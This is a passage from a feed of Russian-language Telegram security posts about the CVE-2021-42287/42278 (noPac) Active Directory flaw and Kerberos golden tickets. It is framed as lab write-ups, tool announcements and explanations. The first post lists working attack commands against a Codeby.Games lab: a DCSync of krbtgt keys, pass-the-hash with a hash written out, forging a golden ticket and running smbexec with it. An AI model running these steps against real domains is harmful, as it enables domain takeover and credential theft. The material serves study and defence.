\u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0447\u043b\u0435\u043d\u0441\u0442\u0432\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u0433\u0440\u0443\u043f\u043f\u0430\u0445, \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u0445 \u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0430\u0445, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e.\n\n\u0412\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u044f\u0441\u044c \u043a \u043f\u0430\u0442\u0447\u0443, Microsoft \u043e\u0431\u043d\u043e\u0432\u0438\u043b\u0430 PAC, \u0434\u043e\u0431\u0430\u0432\u0438\u0432 \u0434\u0432\u0435 \u043d\u043e\u0432\u044b\u0435 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0434\u0430\u043d\u043d\u044b\u0445: PAC_ATTRIBUTES_INFO \u0438 PAC_REQUESTOR. \u041d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u0447\u0430\u0441\u0442\u044c\u044e \u043f\u0430\u0442\u0447\u0430 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u043e\u0439 PAC_REQUESTOR. \u0421 \u0435\u0451 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u0435\u043c KDC \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f (\u043a\u043b\u0438\u0435\u043d\u0442\u0430) \u0432 \u0431\u0438\u043b\u0435\u0442\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0430\u0437\u0440\u0435\u0448\u0430\u0435\u0442\u0441\u044f \u0432 SID, \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0439 \u0432 PAC. 
\u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0441 \u043e\u043a\u0442\u044f\u0431\u0440\u044f 2022 \u0433\u043e\u0434\u0430 \u043b\u044e\u0431\u043e\u0439 \u0431\u0438\u043b\u0435\u0442 \u0431\u0435\u0437 \u043d\u043e\u0432\u043e\u0439 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b PAC (\u0438\u043b\u0438 \u0431\u0438\u043b\u0435\u0442 \u0434\u043b\u044f \u043d\u0435\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f) \u0431\u0443\u0434\u0435\u0442 \u043e\u0442\u043a\u043b\u043e\u043d\u0435\u043d. \u0415\u0441\u0442\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u0435\u0441\u043b\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043e.\n\u0412 \u044d\u0442\u043e\u043c \u0438 \u043a\u0440\u043e\u0435\u0442\u0441\u044f \u0441\u0443\u0442\u044c \u043e\u0448\u0438\u0431\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043c\u044b \u043c\u043e\u0433\u043b\u0438 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0442\u044c \u0432\u044b\u0448\u0435.\n\n\u0412\u043c\u0435\u0441\u0442\u0435 \u0441 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043f\u043e\u0434\u0445\u043e\u0434 \u043a \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044e \u0437\u043e\u043b\u043e\u0442\u044b\u0445 \u0431\u0438\u043b\u0435\u0442\u043e\u0432 \u0442\u043e\u0436\u0435 \u0438\u0437\u043c\u0435\u043d\u0438\u043b\u0441\u044f. 
\u041c\u044b \u043d\u0435 \u043c\u043e\u0436\u0435\u043c \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c Golden Ticket \u0434\u043b\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u043d\u043e \u043c\u043e\u0436\u0435\u043c \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u043c!\n\u0414\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u0435 Impacket!\napt install python3-impacket\n\u041f\u043e\u0441\u043b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0437\u043e\u043b\u043e\u0442\u043e\u0439 \u0431\u0438\u043b\u0435\u0442 \u043c\u043e\u0436\u043d\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439:\npython3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN -user-id 1000 validuser\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043e\u0431\u0440\u0430\u0442\u043d\u0430\u044f \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u043e \u0441\u0442\u0430\u0440\u044b\u043c PAC \u0442\u0430\u043a \u0436\u0435 \u043e\u0441\u0442\u0430\u043d\u0435\u0442\u0441\u044f:\npython3 ticketer.py -nthash $krbtgtRC4key -domain-sid $domainSID -domain $DOMAIN -old-pac username\n\n\u041f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043f\u0440\u0438\u043c\u0435\u0440 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f Golden Ticket \u043d\u0430 \u043f\u0440\u0438\u043c\u0435\u0440\u0435 \u0443\u0436\u0435 \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u043d\u043d\u043e\u0439 \u043c\u043d\u043e\u0439 \u043b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u043d\u043e\u0439 Kingdom \u0441 
\u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Codeby.Games:\n# \u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c SID \u0434\u043e\u043c\u0435\u043d\u0430:\nimpacket-lookupsid codeby.cdb/administrator:'Not_alon3'@192.168.2.4\n\n# \u0414\u0435\u043b\u0430\u0435\u043c DCSync, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043a\u043b\u044e\u0447\u0438 \u0443\u0447\u0435\u0442\u043a\u0438 krbtgt:\nimpacket-secretsdump codeby.cdb/administrator:'Not_alon3'@192.168.2.4 -just-dc-user krbtgt\n\n# \u041e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u043c RID-\u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0430\u0440 RID+user (\u0442\u0443\u0442 \u044f \u0432\u043d\u0435\u0437\u0430\u043f\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b Pass-the-Hash):\ncrackmapexec smb 192.168.2.4 -u Administrator -H 3c3d0f466260c126a80abe255cdfffad --rid-brute\n\n# \u0412\u044b\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u0437\u043e\u043b\u043e\u0442\u043e\u0439 \u0431\u0438\u043b\u0435\u0442:\nimpacket-ticketer -aesKey\nc8a4d26bcf29ff5cd29882308907b5536af9857de7cbfb4c1bf1cd789b3799d2 -domain-sid S-1-5-21-1870022127-3338747641-451296598 -domain codeby.cdb -user-id 1105 amaslova\n\n# \u0414\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u043c \u0437\u0430\u043f\u0438\u0441\u044c \u0432 /etc/hosts, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e Kerberos \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441 \u0438\u043c\u0435\u043d\u0430\u043c\u0438 \u0441\u043b\u0443\u0436\u0431:\necho '192.168.2.4 kingdom.codeby.cdb kingdom codeby.cdb' &gt;&gt; /etc/hosts\n\n# \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c smbexec \u0441 \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u043c \u0437\u043e\u043b\u043e\u0442\u044b\u043c \u0431\u0438\u043b\u0435\u0442\u043e\u043c:\nexport KRB5CCNAME=amaslova.ccache\nimpacket-smbexec 
codeby.cdb/amaslova@kingdom.codeby.cdb -k -no-pass\n\n\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u043d\u0430 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0445 \u043a \u043f\u043e\u0441\u0442\u0443 (\u043d\u0438\u0436\u0435) \u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442\u0430\u0445. \u041d\u0430 \u043f\u0435\u0440\u0432\u043e\u043c \u0438\u0437 \u043d\u0438\u0445 \u0432\u0438\u0434\u043d\u0430 \u043f\u043e\u043f\u044b\u0442\u043a\u0430 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0431\u0438\u043b\u0435\u0442 \u043d\u0430 \u043d\u0435\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0430 \u043d\u0430 \u0432\u0442\u043e\u0440\u043e\u043c \u2014 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0437\u043e\u043b\u043e\u0442\u043e\u0433\u043e \u0431\u0438\u043b\u0435\u0442\u0430, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u043b\u044f \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 amaslova!", "creation_timestamp": "2024-04-06T07:44:05.000000Z"}, {"uuid": "c6a3d764-f72a-429b-a901-5325d8027174", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/poxek/1578", "content": "NoPacScan\n\u042d\u0442\u043e \u0441\u043a\u0430\u043d\u0435\u0440 CVE-2021-42287/CVE-2021-42278, \u043e\u043d \u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u0442 \u0431\u043e\u043b\u044c\u0448\u0435 
\u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u043e\u0432 \u0434\u043e\u043c\u0435\u043d\u0430, \u0447\u0435\u043c \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u044b\u0439 \u0441\u043a\u0440\u0438\u043f\u0442, \u0438 \u0431\u043e\u043b\u0435\u0435 \u0442\u043e\u0447\u0435\u043d, \u0447\u0435\u043c \u043e\u043d. \u041e\u043d \u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u0442 DC \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e DNS \u043f\u043e\u0438\u0441\u043a\u0430 _msdcs.aaa.com, \u044d\u0442\u043e \u043b\u0443\u0447\u0448\u0435, \u0447\u0435\u043c LDAP \u0438 SAMR, \u0438 \u043e\u043d \u0431\u0443\u0434\u0435\u0442 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432\u0441\u0435 DC, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u044b \u043d\u0430\u0445\u043e\u0434\u0438\u043c. \u0415\u0441\u043b\u0438 \u0432\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0435 LDAP \u0438\u043b\u0438 SAMR, \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e, \u0432\u044b \u043f\u0440\u043e\u043f\u0443\u0441\u0442\u0438\u0442\u0435 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 DC, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0434\u0430\u043b\u0435\u043d\u044b \u0438\u0437 Primary DC. 
\u0414\u043b\u044f \u0431\u043e\u043b\u044c\u0448\u0435\u0439 \u0442\u043e\u0447\u043d\u043e\u0441\u0442\u0438, \u043e\u043d \u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u0442 Pac, \u0433\u0434\u0435 \u0442\u0438\u043f \u0440\u0430\u0432\u0435\u043d 0x10, \u0447\u0442\u043e \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u043c \u043f\u0430\u0442\u0447\u0435\u043c Microsoft \u0434\u043b\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\nhttps://github.com/knightswd/NoPacScan\n\n\u0414\u043d\u0435\u0432\u043d\u0438\u043a \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u0430 \ud83d\udee1", "creation_timestamp": "2022-05-19T07:01:56.000000Z"}, {"uuid": "5e372a6c-cd4c-44e9-9e70-05db38c4c49a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/monkey_hacker/54", "content": "Domain Admin in a few seconds (CVE-2021-42278 | CVE-2021-42287)\n\n\u0422\u0430\u043a\u043e\u0439 \u0441\u043f\u043e\u0441\u043e\u0431 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u0443\u0436\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043f\u043e\u0447\u0442\u0438 \u0434\u0432\u0430 \u0433\u043e\u0434\u0430, \u043e\u0434\u043d\u0430\u043a\u043e \u044d\u0442\u043e\u0442 \u0441\u043f\u043e\u0441\u043e\u0431 \u0430\u043a\u0442\u0443\u0430\u043b\u0435\u043d \u0438 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439. \u0410 \u043a\u0430\u043a\u0438\u0435 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u044b \u043e\u043d\u043e \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442?\n\n1. 
\u041f\u043e \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u0443 \u0432 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u0445, \u043e\u0431\u044b\u0447\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0434\u043e\u043c\u0435\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0441\u043e\u0435\u0434\u0438\u043d\u0438\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u043a AD \u0442\u043e\u043b\u044c\u043a\u043e 10 \u0440\u0430\u0437. \n\u0427\u0442\u043e\u0431\u044b \u044d\u0442\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c, \u043c\u043e\u0436\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443:\n\nGet-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota\n\n\u0427\u0442\u043e\u0431\u044b \u043e\u0442\u043b\u0438\u0447\u0430\u0442\u044c \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043e\u0442 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432, \u043e\u043d\u0438 \u0434\u043e\u043b\u0436\u043d\u044b \u0438\u043c\u0435\u0442\u044c \u0432 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0435 sAMAccountName \u043d\u0430 \u043a\u043e\u043d\u0446\u0435 $. \u041e\u0434\u043d\u0430\u043a\u043e \u043f\u0440\u0438\u043a\u043e\u043b \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u044d\u0442\u043e\u0442 \u0441\u0438\u043c\u0432\u043e\u043b \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442\u0441\u044f. 
\u0410\u0442\u0440\u0438\u0431\u0443\u0442\u043e\u043c \u0438\u043c\u0435\u043d\u0438 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f sAMAccountName. \u042d\u0442\u043e\u0442 \u0430\u0442\u0440\u0438\u0431\u0443\u0442 \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u0438 \u043e\u0442\u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432\u0440\u0443\u0447\u043d\u0443\u044e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e ADSIEdit Tool\n\n2. \u041f\u0440\u0438 \u0437\u0430\u043f\u0440\u043e\u0441\u0435 \u0431\u0438\u043b\u0435\u0442\u0430 \u043d\u0430 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0435 \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043f\u0440\u0435\u0434\u044a\u044f\u0432\u0438\u0442\u044c TGT. \u0415\u0441\u043b\u0438 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c\u044b\u0439 \u0431\u0438\u043b\u0435\u0442 \u043d\u0435 \u043d\u0430\u0439\u0434\u0435\u043d KDC, KDC \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u044b\u0439 \u043f\u043e\u0438\u0441\u043a \u0441 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c $. 
\u0415\u0441\u043b\u0438 TGT \u043f\u043e\u043b\u0443\u0447\u0435\u043d \u0434\u043b\u044f username, \u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c username \u0443\u0434\u0430\u043b\u0435\u043d, \u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u044d\u0442\u043e\u0442 TGT \u0434\u043b\u044f \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u0441\u0435\u0440\u0432\u0438\u0441\u043d\u043e\u0433\u043e \u0431\u0438\u043b\u0435\u0442\u0430 \u0434\u043b\u044f \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0447\u0435\u0440\u0435\u0437  S4U2self  \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u0442 \u043a \u0442\u043e\u043c\u0443, \u0447\u0442\u043e KDC \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043a\u0430\u0442\u044c username$ \u0432 AD. \n\n\u041e\u0431\u044a\u0435\u0434\u0438\u043d\u044f\u044f \u044d\u0442\u0438 \u0432\u0443\u043b\u043d\u044b, \u043c\u044b \u0438\u043c\u0435\u0435\u043c \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0442\u0430\u043a\u043e\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439\n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442 TGT. \u0417\u0430\u0442\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043f\u044b\u0442\u0430\u0442\u044c\u0441\u044f \u0443\u0434\u0430\u043b\u0438\u0442\u044c \u0438\u043b\u0438 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u0442\u044c \u0438\u0441\u0445\u043e\u0434\u043d\u0443\u044e \u0443\u0447\u0435\u0442\u043d\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430. 
\u041f\u043e\u043b\u0443\u0447\u0438\u0432 TGT, \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043d\u0430\u0447\u0430\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c sAMAccountName. \u0410 \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u0437\u043d\u0430\u044f, \u0447\u0442\u043e KDC \u043f\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0442\u0438\u043a\u0435\u0442\u044b \u0438 \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u0441\u0435\u0430\u043d\u0441\u043e\u0432\u044b\u0435 \u043a\u043b\u044e\u0447\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430\u043c \u0432 \u0434\u043e\u043c\u0435\u043d\u0435, \u043c\u044b \u044d\u0442\u043e \u043c\u043e\u0436\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439\n\n\u0421\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0442\u0430\u043a:\n\n1. \u0412 \u0434\u043e\u043c\u0435\u043d \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0432\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430.\n2. 
\u0421\u043e\u0437\u0434\u0430\u043d\u043d\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0438\u0438 \u0441 \u0438\u043c\u0435\u043d\u0435\u043c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430\n3. \u0417\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442\u0441\u044f Kerberos TGT \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0438\u043c\u0435\u043d\u0438 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430.\n4. \u0421\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0435 \u0438\u043c\u044f \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0441\u043d\u043e\u0432\u0430 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u0435  \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435.\n5. 
\u0421\u0435\u0440\u0432\u0438\u0441\u043d\u044b\u0439 \u0431\u0438\u043b\u0435\u0442 Kerberos \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044f S4U2self\n\n\u0417\u0432\u0443\u0447\u0438\u0442 \u0434\u0443\u0448\u043d\u043e, \u0431\u043b\u0430\u0433\u043e \u0435\u0441\u0442\u044c noPac, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u0434\u0430\u043d\u043d\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443\n\nTHX:\n\nhttps://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html\n\nhttps://github.com/elastic/detection-rules/blob/a5359ca675267220afedf67795cd1fd04881b2c8/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml\n\nhttps://github.com/WazeHell/sam-the-admin", "creation_timestamp": "2023-03-16T11:56:00.000000Z"}, {"uuid": "7fdd9d4d-9b4f-4b9e-9a08-0c78275eca11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/poxek/2147", "content": "\u0421\u043f\u0443\u0444\u0438\u043d\u0433 sAMAccountName: \u043e\u0442 LowPriv \u0434\u043e \u0434\u043e\u043c\u0435\u043d \u0430\u0434\u043c\u0438\u043d\u0430 \u0437\u0430 \u0448\u0435\u0441\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0427\u0430\u0440\u043b\u0438 \u041a\u043b\u0430\u0440\u043a (@exploitph, \u0438\u0437\u0432\u0435\u0441\u0442\u0435\u043d \u0441\u0432\u043e\u0438\u043c \u0444\u043e\u0440\u043a\u043e\u043c PowerView) \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b \u0441\u0432\u0435\u0436\u0438\u0439 \u0441\u043f\u043e\u0441\u043e\u0431 
